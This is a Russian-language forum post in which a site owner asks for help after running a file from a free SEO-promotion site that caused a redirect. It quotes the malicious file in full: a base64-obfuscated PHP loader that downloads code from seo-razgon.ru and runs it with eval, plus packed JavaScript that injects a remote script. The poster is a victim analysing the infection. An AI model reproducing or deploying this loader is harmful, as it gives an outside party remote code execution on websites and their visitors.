вопрос
Здравствуйте люди добрые, у меня проблема с редиректом, может поможете.
Я в поисках халявной раскрутки сайта, наткнулся на такой простенький сайтик seo-razgon.ru
Скачал файл, залил в корень сайта , и как дурак, запустил... В результате появился редирект на этот сайт епт.
Искал в .htaccess , он чист
Вот код того файла, который я скачал с сайта:
Но он зашифрован, расшифровал
Дальше смотрим этот файл txt
Он тоже зашифрован, расшифруем:
Вроде бы обычная статистическая страница, но тут интересный ява-скрипт:
У меня все ходы цепочки закончились, не знаю, куда дальше копать...
Проверил .htacess , он чист
Проверял сайт rescan.pro (прикреплена картинка)
Я в поисках халявной раскрутки сайта, наткнулся на такой простенький сайтик seo-razgon.ru
Скачал файл, залил в корень сайта , и как дурак, запустил... В результате появился редирект на этот сайт епт.
Искал в .htaccess , он чист
Вот код того файла, который я скачал с сайта:
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('aHR0cDovL3Nlby1yYXpnb24ucnUvd29yay50eHQ=');$q=$_GET['q'];if($q)$b.=base64_decode('P3E9').$q;$d=file_get_contents($b);eval($d); ?>Но он зашифрован, расшифровал
<?php ini_set('display_errors','Off');error_reporting('E_ALL');$b=base64_decode('http://seo-razgon.ru/work.txt=');$q=$_GET['q'];if($q)$b.=base64_decode('?q=').$q;$d=file_get_contents($b);eval($d); ?>Дальше смотрим этот файл txt
header("Content-type: text/html; charset=UTF-8");echo base64_decode('PCFET0NUWVBFIGh0bWw+DQo8aHRtbD4NCjxoZWFkPg0KICAgIDxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sOyBjaGFyc2V0PVVURi04IiAvPg0KICAgIDx0aXRsZT7Qn9CQ0J3QldCb0Kwg0KPQn9Cg0JDQktCb0JXQndCY0K8g0J/QoNCe0JPQntCd0JDQnNCYPC90aXRsZT4NCiAgICA8bGluayBocmVmPSJodHRwOi8vc2VvLXJhemdvbi5ydS9jc3MvcGFuZWwuY3NzIiByZWw9InN0eWxlc2hlZXQiIHR5cGU9InRleHQvY3NzIiBtZWRpYT0ic2NyZWVuIiAvPg0KICAgIDxsaW5rIGhyZWY9Imh0dHA6Ly9zZW8tcmF6Z29uLnJ1L2ltZy9mYXZpY29uLmljbyIgcmVsPSJzaG9ydGN1dCBpY29uIiB0eXBlPSJpbWFnZS94LWljb24iIC8+DQo8L2hlYWQ+DQo8Ym9keSBvbmNvbnRleHRtZW51PSJyZXR1cm4gZmFsc2U7Ij4NCiAgICA8ZGl2IGlkPSJtYWluIj4NCiAgICAgICAgPGRpdiBpZD0ibmV3Ij48aDE+0J/QkNCd0JXQm9CsINCj0J/QoNCQ0JLQm9CV0J3QmNCvPC9oMT48L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibWVudSI+DQogICAgICAgICAgICA8YnV0dG9uIG9uY2xpY2s9ImdldF9kYXRhKCdjYXRhbG9nJykiPtCf0KDQntCT0J7QnSDQn9CeINCa0JDQotCQ0JvQntCT0JDQnDwvYnV0dG9uPg0KICAgICAgICAgICAgPGJ1dHRvbiBvbmNsaWNrPSJnZXRfZGF0YSgnc3ByJykiPtCg0JXQk9CY0KHQotCg0JDQptCY0K8g0JIg0KHQn9Cg0JDQktCe0KfQndCY0JrQkNClPC9idXR0b24+DQogICAgICAgICAgICA8ZGl2IGlkPSJyZXMiPtCk0LDQudC7INGD0YHRgtCw0L3QvtCy0LvQtdC9INC60L7RgNGA0LXQutGC0L3QvjwvZGl2Pg0KICAgICAgICA8L2Rpdj4NCiAgICAgICAgPGRpdiBpZD0ibGlua3MiPjxhIGhyZWY9IiMiPtCi0KPQoiDQkdCj0JTQo9CiINCT0JXQndCV0KDQmNCg0J7QktCQ0KLQrNCh0K8g0J7QkdCg0JDQotCd0KvQlSDQodCh0KvQm9Ca0JgsINCV0KHQm9CYINCR0KPQlNCV0KIg0J3Qo9CW0J3QnjwvYT48L2Rpdj4NCiAgICA8L2Rpdj4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cDovL3Nlby1yYXpnb24ucnUvanMvcGFuZWwubWluLmpzIj48L3NjcmlwdD4NCjwvYm9keT4NCjwvaHRtbD4=');Он тоже зашифрован, расшифруем:
header("Content-type: text/html; charset=UTF-8");echo base64_decode('<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>ПАНЕЛЬ УПРАВЛЕНИЯ ПРОГОНАМИ</title>
<link href="http://seo-razgon.ru/css/panel.css" rel="stylesheet" type="text/css" media="screen" />
<link href="http://seo-razgon.ru/img/favicon.ico" rel="shortcut icon" type="image/x-icon" />
</head>
<body oncontextmenu="return false;">
<div id="main">
<div id="new"><h1>ПАНЕЛЬ УПРАВЛЕНИЯ</h1></div>
<div id="menu">
<button onclick="get_data('catalog')">ПРОГОН ПО КАТАЛОГАМ</button>
<button onclick="get_data('spr')">РЕГИСТРАЦИЯ В СПРАВОЧНИКАХ</button>
<div id="res">Файл установлен корректно</div>
</div>
<div id="links"><a href="#">ТУТ БУДУТ ГЕНЕРИРОВАТЬСЯ ОБРАТНЫЕ ССЫЛКИ, ЕСЛИ БУДЕТ НУЖНО</a></div>
</div>
<script src="http://seo-razgon.ru/js/panel.min.js"></script>
</body>
</html>=');Вроде бы обычная статистическая страница, но тут интересный ява-скрипт:
eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('b h(5){1 0=2.j(\'0\');k(0!=o){0.9.a(0)}1 3=2.c(\'d\');3.e=\'f://g-8.i/6/3.6?5=\'+5;1 7=2.l.m(3);7.n=\'0\'}1 4=p q();4.r(4.s()+t);2.u=\'v=w;x=/;y=\'+4;',35,35,'result|var|document|panel|D|vid|js|ap|razgon|parentNode|removeChild|function|createElement|script|src|http|seo|get_data|ru|getElementById|if|head|appendChild|id|undefined|new|Date|setDate|getDate|100|cookie|_y_m_|off|path|expires'.split('|'),0,{}))У меня все ходы цепочки закончились, не знаю, куда дальше копать...
Проверил .htacess , он чист
Проверял сайт rescan.pro (прикреплена картинка)
